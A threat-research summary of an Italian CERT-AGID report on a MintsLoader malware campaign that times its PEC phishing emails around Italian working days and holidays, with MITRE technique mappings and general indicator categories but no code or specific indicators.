Threat Research

New MintsLoader Campaign Confirms a Targeted Temporal Strategy

Italy-Cert-agid
New MintsLoader Campaign Confirms a Targeted Temporal Strategy

A new wave of the MintsLoader campaign, the ninth detected in 2025, highlights how malicious actors can adapt to the Italian work calendar and national holidays. The campaign employs PowerShell-based loaders and compromised PEC emails to distribute Infostealer malware with sophisticated evasion techniques. #MintsLoader #Infostealer #PEC

Keypoints

  • The ninth MintsLoader campaign of 2025 was observed, showing adaptability to Italian work schedules and holidays by launching attacks on Wednesdays instead of Mondays.
  • The shift in attack timing followed the national holiday of June 2nd, affecting the first working day of the week.
  • Attackers exploit Italian work habits by targeting PEC (certified email) users when they are more likely to check work-related emails after breaks.
  • The campaign spreads malware via PowerShell-based MintsLoader through obfuscated JavaScript links sent in PEC emails.
  • A Domain Generation Algorithm (DGA) is used to create dynamic malicious domains activated during working hours to evade detection.
  • Final payload retrieval is increasingly difficult due to strict server-side controls, complicating malware analysis.
  • Countermeasures include collaboration with PEC providers and sharing Indicators of Compromise (IoCs) through CERT-AGID feeds; users are advised to report suspicious PEC emails to [email protected].

MITRE Techniques

  • [T1059] Command and Scripting Interpreter – The campaign uses PowerShell scripts to execute the MintsLoader malware payload. (‘PowerShell-based MintsLoader’)
  • [T1566] Phishing – Malicious emails with obfuscated JavaScript links are sent via PEC to deliver malware. (‘Sending emails containing links to obfuscated JavaScript files’)
  • [T1483] Domain Generation Algorithms – Attackers utilize a DGA to dynamically generate and activate malicious domains during working hours. (‘Use of Domain Generation Algorithm (DGA) for dynamic malicious domain generation’)

Indicators of Compromise

  • [Domains] Dynamic malicious domains generated by the campaign’s DGA during working hours (specific domains not listed, but provided in IoC download link)
  • [File Names] Obfuscated JavaScript files linked in PEC emails used to initiate infection
  • [Email] Compromised PEC accounts used to distribute malicious emails

Read more: https://cert-agid.gov.it/news/nuova-campagna-mintsloader-conferma-una-mirata-strategia-temporale/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint